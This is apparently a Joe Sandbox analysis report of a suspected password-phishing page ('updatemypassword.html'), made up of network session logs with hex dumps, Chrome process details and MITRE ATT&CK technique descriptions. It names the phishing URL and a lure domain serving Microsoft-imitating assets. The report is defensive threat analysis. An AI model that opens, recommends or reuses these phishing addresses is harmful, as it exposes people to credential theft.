2024-04-17 23:23:18 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/079C) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus2-z1 Cache-Control: public, max-age=27571 Date: Wed, 17 Apr 2024 23:23:18 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49754	23.201.212.130	443

Timestamp	Bytes transferred	Direction	Data
2024-04-17 23:23:18 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-17 23:23:19 UTC	530	IN	HTTP/1.1 200 OK Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Content-Type: application/octet-stream ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0rcGnYgAAAAANOnx9vccHTr21ROgX9ESTU0pDRURHRTAzMDkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm Cache-Control: public, max-age=27613 Date: Wed, 17 Apr 2024 23:23:19 GMT Content-Length: 55 Connection: close X-CID: 2
2024-04-17 23:23:19 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49755	199.36.158.100	443	5772	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-17 23:23:19 UTC	379	OUT	GET /d..p/others/mi..cro---t/favicon.ico HTTP/1.1 Host: cdn-jm-tools.web.app Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-17 23:23:19 UTC	595	IN	HTTP/1.1 200 OK Connection: close Content-Length: 17174 Cache-Control: max-age=3600 Content-Type: image/x-icon Etag: "928026765089cd2a4183510ed4f8be0259cd85b776338ee2c337cacc18bdf016" Last-Modified: Sat, 25 Apr 2020 21:22:54 GMT Strict-Transport-Security: max-age=31556926; includeSubDomains; preload Accept-Ranges: bytes Date: Wed, 17 Apr 2024 23:23:19 GMT X-Served-By: cache-pdk-kfty2130039-PDK X-Cache: HIT X-Cache-Hits: 1 X-Timer: S1713396199.264531,VS0,VE1 Vary: x-fh-requested-host, accept-encoding alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
2024-04-17 23:23:19 UTC	1378	IN	Data Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
2024-04-17 23:23:19 UTC	1378	IN	Data Raw: 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 Data Ascii: """""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""
2024-04-17 23:23:19 UTC	1378	IN	Data Raw: 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 Data Ascii: 3333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 3333333333333333333
2024-04-17 23:23:19 UTC	1378	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2024-04-17 23:23:19 UTC	1378	IN	Data Raw: 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 Data Ascii: DDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDD
2024-04-17 23:23:19 UTC	1378	IN	Data Raw: 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 Data Ascii: UUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUU
2024-04-17 23:23:19 UTC	1378	IN	Data Raw: 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 Data Ascii: DDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
2024-04-17 23:23:19 UTC	1378	IN	Data Raw: 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 Data Ascii:
2024-04-17 23:23:19 UTC	1378	IN	Data Raw: 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 Data Ascii: """""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333"""""""""
2024-04-17 23:23:19 UTC	1378	IN	Data Raw: 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 Data Ascii: UDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUU

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49756	13.107.213.41	443	5772	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-17 23:23:19 UTC	417	OUT	GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-17 23:23:19 UTC	805	IN	HTTP/1.1 200 OK Date: Wed, 17 Apr 2024 23:23:19 GMT Content-Type: image/svg+xml Content-Length: 673 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Wed, 12 Feb 2020 22:01:30 GMT ETag: 0x8D7B0071D86E386 x-ms-request-id: b1c5804b-e01e-0044-7b50-909a87000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240417T232319Z-18655757dbc6pjc9kve5vp9er800000005a000000000h7ks x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-04-17 23:23:19 UTC	673	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01 21 02 39 81 41 Data Ascii: Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1#vGal9!9A

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: chrome.exePID: 5408, Parent PID: 480

General

Target ID:	0
Start time:	01:23:06
Start date:	18/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 5772, Parent PID: 5408

General

Target ID:	2
Start time:	01:23:10
Start date:	18/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 --field-trial-handle=2252,i,10177473466307543095,12274142213128693203,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6404, Parent PID: 480

General

Target ID:	3
Start time:	01:23:13
Start date:	18/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 47

Chrome Cache Entry: 48

Chrome Cache Entry: 49

Chrome Cache Entry: 50

Chrome Cache Entry: 51

Chrome Cache Entry: 52

Chrome Cache Entry: 53

Chrome Cache Entry: 54

Chrome Cache Entry: 55

Chrome Cache Entry: 56

Chrome Cache Entry: 57

Chrome Cache Entry: 58

Chrome Cache Entry: 59

Chrome Cache Entry: 60

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

Windows Analysis Report
https://pub-ac902c48ff244e4fbf44f3e3296d093d.r2.dev/updatemypassword.html